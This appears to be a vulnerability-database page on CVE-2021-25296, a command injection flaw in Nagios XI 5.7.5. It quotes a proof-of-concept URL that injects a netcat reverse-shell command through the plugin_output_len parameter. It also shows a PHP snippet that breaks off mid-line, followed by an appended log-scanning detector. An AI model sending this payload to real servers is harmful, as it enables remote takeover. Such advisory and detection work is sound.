CVE-2021-25296

Published: 15/02/2021 Updated: 18/02/2021
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

Nagios XI could allow a remote authenticated malicious user to execute arbitrary commands on the system, caused by improper validation of user-supplied input by the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. By sending a specially crafted single HTTP request, an attacker could exploit this vulnerability to inject and execute arbitrary commands on the system.

Most Upvoted Vulmon Research Post

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication):

https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024;%20nc%20-e%20/bin/sh%20127.0.0.1%204444;&submitButton2=

payload: 1024; nc -e /bin/sh 127.0.0.1 4444;

https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs

Vulnerable Product

nagios nagios xi 5.7.5

Github Repositories

Bugs reported to Nagios XI

nagios-xi-5.7.5-bugs

Bugs reported to Nagios XI

CVE-2021-25296

Code Location: /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php

Code snippet:

    if (!empty($plugin_output_len)) {
        $disk_wmi_command = " --forcetruncateoutput " . $plugin_output_len;
        $service_wmi_command = " --forcetruncateoutput " . $plugin_output_len;
        $proc
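
A detection-side example, added here and not taken from this page, the linked repository or Nagios: it scans web server access log lines for windowswmi config wizard requests whose plugin_output_len value is not a plain integer, which is the input the snippet above concatenates into a command line. The log format (Apache combined), the function names and the sample entries are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_output_len(target):
    """Return plugin_output_len values that are not plain decimal integers,
    or [] when the target is not a windowswmi config wizard request."""
    parts = urlsplit(target)
    if not parts.path.endswith("/config/monitoringwizard.php"):
        return []
    # Split on "&" only, so a raw ";" stays inside the value it belongs to.
    params = [(unquote_plus(k), unquote_plus(v))
              for k, _, v in (p.partition("=") for p in parts.query.split("&"))]
    if ("wizard", "windowswmi") not in params:
        return []
    # The parameter may repeat and PHP keeps the last value, so check them all.
    return [v for k, v in params
            if k == "plugin_output_len" and v and not re.fullmatch(r"[0-9]+", v)]

def scan(lines):
    """Return (client_ip, offending_values) for every flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        bad = suspicious_output_len(m.group(1)) if m else []
        if bad:
            hits.append((line.split(" ", 1)[0], bad))
    return hits

# Constructed sample entries (documentation IP ranges, harmless marker command).
PREFIX = '[15/Feb/2021:10:00:00 +0000] "GET /nagiosxi/'
SAMPLE_LOG = [
    "192.0.2.10 - - " + PREFIX + "config/monitoringwizard.php?update=1&nextstep=3"
    '&wizard=windowswmi&plugin_output_len=1024&submitButton2= HTTP/1.1" 200 5120',
    "203.0.113.7 - - " + PREFIX + "config/monitoringwizard.php?update=1&nextstep=3"
    "&wizard=windowswmi&plugin_output_len=&plugin_output_len=1024;%20id;"
    '&submitButton2= HTTP/1.1" 200 5120',
    "192.0.2.10 - - " + PREFIX + 'index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, values in scan(SAMPLE_LOG):
        print(ip, values)
```

Parameters sent in a POST body do not appear in access logs, so this covers only query-string requests such as the one in the research post.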